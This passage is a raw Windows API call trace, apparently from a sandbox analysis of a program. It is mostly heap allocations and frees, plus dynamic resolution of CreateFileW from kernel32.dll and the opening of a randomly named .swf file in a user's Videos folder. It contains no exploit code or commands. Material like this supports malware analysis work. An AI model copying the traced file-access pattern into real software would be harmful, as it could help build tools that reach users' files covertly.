(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0105.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0105.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0105.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0105.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0105.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0105.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0105.477] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0105.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0105.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0105.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0105.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0105.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0105.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0105.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0105.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0105.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0105.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0105.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0105.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.480] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0105.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0105.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.482] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0105.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cabf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0105.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.483] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0105.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0105.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0105.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0105.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0105.484] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\hf dn4y4llhbc.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0105.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0105.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0105.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0105.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0105.486] FreeLibrary (hLibModule=0x772d0000) returned 1 [0105.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 